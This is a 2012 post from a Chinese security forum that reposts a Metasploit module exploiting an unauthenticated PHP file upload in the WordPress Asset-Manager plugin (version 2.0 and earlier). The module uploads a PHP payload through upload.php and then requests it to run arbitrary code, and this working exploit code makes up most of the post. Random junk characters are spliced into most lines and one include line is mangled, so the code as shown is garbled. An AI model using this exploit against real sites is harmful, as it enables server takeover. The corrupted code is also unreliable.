找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2210|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。8 n  c1 B0 K. Y
. d3 @0 X3 E5 b- C. m2 B- P2 k
##
# K9 H! J) ?6 A% `" j$ L* h# This file is part of the Metasploit Framework and may be subject to
4 S# z! ^  s' J; |+ y$ a# redistribution and commercial restrictions. Please see the Metasploit
( Q5 C6 Y' j) f  x& }, U# @# Framework web site for more information on licensing and terms of use.
1 M& ]& Z% K# B#   http://metasploit.com/framework/
9 m9 [) }; @% T, n6 ]6 g##5 K+ Y7 |% z# V+ V" h& s9 |, n
2 Q3 T+ N5 O5 j. v& m, q' m( f' p
require 'msf/core'
4 C* z: L1 n) ]( r, }7 F( E2 C  Drequire 'msf/core/exploit/php_exe'
- Z+ q1 y8 Q9 t, J. P* L; Z , B4 ^- H, V5 L* t- V  h
class Metasploit3 < Msf::Exploit::Remote& e& `& v6 N9 }1 L5 ?( ?& @
  Rank = ExcellentRanking2 v1 O3 S1 i& I( ?- n( W& z

7 y3 m5 u' S3 q4 L' u7 }8 A% Q" z  include Msf::Exploit::Remote::HttpClient- b5 g; X; W$ h1 ^# j$ [1 B6 d
  include Msf::Exploit:hpEXE5 e, T, b* @3 X2 G, a$ v. p+ i6 z

/ c! V9 ?( ?6 b7 H' p7 Y  def initialize(info = {})
% G3 a4 c; D+ b. i# E: ?    super(update_info(info,1 M- h2 x5 a5 q0 A5 Y3 O" B! T1 `4 Y
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
  b5 d$ |2 y; e      'Description'    => %q{* H- o5 b& T6 M
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress" H, F7 v& y% p; v: [) \
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
$ E# Z0 h2 B. g        temp directory without authentication, which results in arbitrary code execution., f+ m7 A0 `5 U0 {8 |& I; |: |
      },
: Q* ?! N- p* j& U, [3 O      'Author'         =>) W  K- h4 X: J1 p1 i
        [
& G0 I. O1 c% s. D! [1 c          'Sammy FORGIT', # initial discovery; ?$ t( n; W# t4 I. ~& x% }
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module* h3 g8 S! W  D" r
        ],
) k7 I( i  j) \% M      'License'        => MSF_LICENSE,6 W; m; u! q/ `' S$ l9 f+ U9 r! ^
      'References'     =>
4 y1 E' y" s+ P        [
; j2 w3 h+ I. Z& {          [ 'OSVDB', '82653' ],) ~9 P9 R% U4 r/ s( w
          [ 'BID', '53809' ],
, _; f- Q6 v; F  k, {3 y          [ 'EDB', '18993' ],! _0 r: q) V0 r: N3 ]/ R
          [ 'URL', 'http:// www.myhack58.com /' ]% Y! E1 _/ U9 D5 B3 Q
        ],
3 [4 j4 y1 G: T6 R) u# ]8 t      'Payload'       =>8 v5 o1 ]/ ~" R8 [6 i( Q
        {
, G7 R, i- D3 [* L3 e' }          'BadChars' => "\x00",
% P$ p% {7 m, ~- t4 I        },
! x5 s6 J9 L. f  f& J# v* A      'Platform'       => 'php',
" G' i  T/ B3 I      'Arch'           => ARCH_PHP,
3 ?: n8 K9 A4 ]/ a, o' D% g      'Targets'        =>
; ~$ V, }2 z4 s2 @3 [5 t        [8 u0 h% b& h3 O
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],$ D# w: V4 x' Q( y) `
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
4 Q0 c3 y/ N1 x* J* o        ],9 ~5 N2 I$ P4 K+ ]* q4 ?0 \) z
      'DefaultTarget' => 0,
3 q3 h% _; c8 z/ K      'DisclosureDate' => 'May 26 2012'))
9 n2 N4 o8 j# {7 N, z 7 k% p% J; F# L1 I
    register_options(
, c, s+ n7 z4 W) e/ G      [( d/ j, ?: \4 j8 m/ @' R
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])' }$ F" r) H, K8 ~
      ], self.class)
& v9 G2 o+ c7 y/ F& m  end2 V" S" b8 R9 G, S

. @* u( d( f6 ?/ |' A& s, g% i  def exploit
1 l2 s+ ^* R9 c- ~    uri =  target_uri.path
3 v7 l* D/ \# K; }    uri << '/' if uri[-1,1] != '/'
3 D$ T2 f" |+ Q/ R# y. q    peer = "#{rhost}:#{rport}"
4 f( @1 ^0 y) c& O& A  E; |    payload_name = "#{rand_text_alpha(5)}.php"; N8 I% [* V) E' ~/ k" Y
    php_payload = get_write_exec_payload(:unlink_self=>true)
1 i! k1 _' K+ A4 C9 P/ o 3 T: P) g$ w! C2 `2 i
    data = Rex::MIME::Message.new
* B  X7 T( t# |+ X    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
4 A) i( ?; h8 ?& V% t8 B" B4 v    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')2 `; s% _$ D1 ~3 X. d, T

5 N/ c. z4 L, O1 [# d( x0 [    print_status("#{peer} - Uploading payload #{payload_name}")9 c' I% ^0 j. y0 I3 T/ |) o
    res = send_request_cgi({$ W8 T5 [3 n1 i6 B
      'method'  => 'POST',
( |# }. Q! x" p4 a! l      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
3 P( D& T# k. j& t2 ~* `# x+ n% N      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
  C9 Y. f6 f. S) {' {      'data'    => post_data
3 o2 [& s) e- |: O/ ~4 l- v' F    })! h; S( h# }% {

$ Z* s- s  X! Z  o) V7 G( I1 m    if not res or res.code != 200 or res.body !~ /#{payload_name}/
+ P) z# n7 S- r' K" G      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
5 @/ Q, F4 Y. `' Z9 Send% m$ F/ p* u% m# [$ E7 g

4 l- M: V# Z4 F! Q    print_status("#{peer} - Executing payload #{payload_name}"): e0 I# ?4 L, P4 L$ E, ?5 ]) y
    res = send_request_raw({, m# k7 O2 E0 n, Q3 b4 s( W2 L
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
3 ?+ q2 q2 w7 L+ b$ l      'method'  => 'GET'
6 {, d, ], s4 ?) i- l2 y- g- a7 N    })' C0 ^5 p+ X+ O9 U  g# e( w1 ?

4 D. b/ ], O, X5 K( [    if res and res.code != 200
$ g4 j8 [1 u6 l% M+ H" Q! m/ j      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")0 w5 l. M" u2 P" E6 c/ \8 |0 z
    end
/ ^" E- v- x5 U. o  end# x! k2 g. O" L" R' C" L( @1 q
end
7 |7 [# I7 f# Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表